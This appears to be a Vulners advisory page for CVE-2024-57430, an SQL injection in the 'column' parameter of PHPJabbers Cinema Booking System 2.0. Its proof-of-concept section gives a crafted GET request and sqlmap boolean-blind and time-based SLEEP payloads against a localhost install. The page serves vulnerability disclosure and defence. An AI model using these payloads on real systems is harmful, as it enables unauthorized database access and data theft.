Vulners
Lucene search
PHPJabbers Cinema Booking System 2.0 SQL Injection
| Reporter | Title | Published | Views | Family All 24 |
|---|---|---|---|---|
 | PHPJabbers Cinema Booking System 2.0 SQL Injection Vulnerability | 5 Feb 202500:00 | – | zdt |
 | CVE-2024-57430 | 4 Feb 202516:00 | – | circl |
 | WordPress plugin Pagerank tools security vulnerability | 28 Jun 202400:00 | – | cnnvd |
| PHPJabbers Cinema Booking System 安全漏洞 | 6 Feb 202500:00 | – | cnnvd |
 | CVE-2024-5730 | 28 Jun 202406:00 | – | cve |
| CVE-2024-57430 | 6 Feb 202500:00 | – | cve |
 | CVE-2024-5730 Pagerank Tools <= 1.1.5 - Reflected XSS | 28 Jun 202406:00 | – | cvelist |
| CVE-2024-57430 | 6 Feb 202500:00 | – | cvelist |
 | Exploit for SQL Injection in Phpjabbers Cinema_Booking_System | 4 Feb 202511:14 | – | githubexploit |
 | EUVD-2024-53585 | 3 Oct 202520:07 | – | euvd |
10
# CVE-2024-57430
An SQL injection vulnerability in the pjActionGetUser function of PHPJabbers Cinema Booking System v2.0 allows attackers to manipulate database queries via the column parameter. Exploiting this flaw can lead to unauthorized information disclosure, privilege escalation, or database manipulation.
Vulnerable Parameter: ```column```
## Impact:
SQL injection can lead to unauthorized access to sensitive information, database modification, and even full compromise of the database server. This poses a critical threat to the confidentiality, integrity, and availability of the application.
## Exploit - Proof of Concept (POC)
### SQL Injection
GET Request on URL: ```http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=*&&direction=ASC&page=1&rowCount=10```
### SQLMAP on column
```
Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=name RLIKE (SELECT (CASE WHEN (7874=7874) THEN 0x6e616d65 ELSE 0x28 END))&direction=ASC&page=1&rowCount=10
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=name AND (SELECT 6530 FROM (SELECT(SLEEP(5)))UFOj)&direction=ASC&page=1&rowCount=10
```Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Feb 2025 00:00Current
8.1High risk
Vulners AI Score8.1
CVSS 3.16.1
EPSS0.00914
SSVC